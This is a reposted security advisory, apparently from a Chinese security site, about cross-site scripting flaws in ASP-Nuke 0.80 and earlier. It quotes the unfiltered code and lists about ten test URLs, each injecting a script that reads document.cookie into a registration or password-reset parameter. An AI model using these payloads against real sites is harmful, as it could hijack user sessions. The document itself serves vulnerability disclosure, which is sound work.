ASPNuke多个跨站脚本漏洞

首页	安全动态	IT新闻	安全人物	本站动态	漏洞公告	病毒警报	木马预警
流氓软件	漏洞分析	入侵检测	升级补丁	安全配置	信道安全	设备安全	协议安全
WEB安全	病毒分析	木马研究	脚本注入	后门探讨	技术应用	数据安全	企业专区

收藏本站

设为首页

ASPNuke多个跨站脚本漏洞

作者：佚名文章来源：不详点击数：更新时间：2007-1-25 11:09:54

发布日期：2005-06-28
更新日期：2005-06-28

受影响系统：

ASP-Nuke ASP-Nuke <= 0.80
描述：

--------------------------------------------------------------------------------

BUGTRAQ  ID: 14062

ASP Nuke是一款开放源码的软件应用，可在web server上运行基于社区的站点。

ASPNuke中存在多个跨站脚本漏洞，起因是没有正确的过滤用户输入。在/module/account/register/forgot_password.asp第33行和103行代码中：

    <?
    ...
    sEmail = steForm("Email")
    ...
    <TR>
<TD class="forml">
<% steTxt "E-Mail" %> (req)<BR>
<INPUT TYPE="text" NAME="email" VALUE="<%= sEmail %>" SIZE="22"
MAXLENGTH="80" class="form">
</TD>
    </TR>
    <TR>
    ...
    ?>

可见对email参数没有任何控制，而参数的值是要放置于HTML页面中的，因此攻击者可以使用类似于以下的URL执行跨站脚本：

http://www.example.com/module/account/register/forgot_password.asp?email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

成功利用这个漏洞的攻击者可以在用户浏览器中执行任意代码。

<*来源：Alberto Trivero （trivero@jumpy.it）

  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111989223906484&w=2
*>

测试方法：

--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/module/account/register/register.asp?FirstName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?LastName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Username=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Password=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Address1=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Address2=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?City=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?ZipCode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

建议：

--------------------------------------------------------------------------------

厂商补丁：

ASP-Nuke
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.asp-nuke.com/downloads.asp 【转自世纪安全网 http://www.21safe.com】

文章录入：admin 责任编辑：admin

上一篇文章： ASPNuke language_select.asp HTTP响应拆分漏洞

下一篇文章： ASP.NET 中如何防范SQL注入式攻击？

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

PHP HTMLEntities和HTML
PHP session.save_path(
Apple Safari javas
PHP Easy Download file
PHP HTMLEntities和HTML
Apple Safari javas
PHP Easy Download file
Kaspersky Labs Anti-Vi
SourceForge database.p
OpenSSL畸形ASN.1结构处

\| 设为首页 \| 加入收藏 \| 联系站长 \| 友情链接 \| 版权申明 \|
Copyright © 2006-2008　www.anquan365.com　安全365 建议使用1024*768分辨率及第三方浏览器对本站进行浏览